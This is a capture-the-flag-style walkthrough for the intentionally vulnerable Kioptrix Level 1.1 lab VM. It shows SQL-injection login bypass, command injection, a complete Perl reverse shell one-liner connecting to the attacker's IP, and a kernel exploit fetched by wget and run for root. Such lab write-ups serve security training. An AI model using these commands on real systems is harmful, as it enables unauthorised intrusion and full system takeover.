Kioptrix: Level 1.1 (#2) Walkthrough

So,this the 2nd machine of the Kioptrix series. Kioptrix is a beginner boot2root series. Letz, get into it;

Link to the VM image:

https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

Download the image file and Open the virtual image in your Vmware/Virtual Box

Enumeration:

So letz find out the IP of the Kioptrix. For that we use the command;

netdiscover 

The highlighted IP is our Kioptrix machine IP

Nmap Scan

nmap -sC -sV 192.168.0.105

Port 80:

We visit the webpage hosted on port 80

http://192.168.0.105:80

We see some kind of login page

Letz checkout the page source code :

ctrl+u

Nothing interesting

Till that time letz run a Gobuster in the background inorder to find the hidden directories.

gobuster dir -u http://192.168.0.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Let run in the background

As we have got the login page letz try for SQL Injection:

Username & password same

And Boom !! We are innn……..

I assume that the back-end sql statement was:

SELECT * FROM USERS WHERE username=’’ AND password=’’

EXPLOITATION:

Now letz try Command Injection.Using the Wappalyzer extension we know that the page is PHP based so;

And we got the command executed.

This means there is possibility of RCE(Remote Code Execute) using a reverse shell. Letz check whether bash or python is installed on the victim machine

;bash — version

We get the output. That measns bash is installed on the machine so we can get a bash reverse shell.

For some reasons I was not able to bash rev shell so tried for perl.

;perl -v

We refer Pentest Monkey for Reverse Shell.

In our terminal we use netcat in listening mode so that we can get the shell in our terminal

nc -nlvp 443

in our terminal

In Webpage

perl -e 'use Socket;$i="192.168.0.104";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

192.168.0.104:- My Kali Linux Machine IP

Hurray !! we got the shell

We are not root user

POST EXPLOITATION:

So now letz escalate our privileges:

Check the Kernel version number;

cat /proc/version

Search google for the Kernel exploit.We got the exploit

https://www.exploit-db.com/exploits/9542

So we letz copy the exploit the exploit.

gedit exploit.c

Copy paste the code in the file.

This exploit is an old exploit hence it throws error when we compile it with gcc compiler.And the flag -m32 was working in my case;so we choose “clang” which comes pre-installed in Kali linux.

clang -o exploit -m32 exploit.c

Now letz place this exploit in our Apache server Directory

mv exploit /var/www/html

Letz start our Apache sever:

service apache2 start

Now in letz open our reverse shell and traverse to /tmp directory ;as this is the directory which has all the permissions(read,write,execute)

wget 192.168.0.104/exploit

ls
chmod 755 exploit

Now run the exploit.

./exploit

And we are the root.

So this was the second machine of the kioptrix series.Stay tuned for the other machines of this series.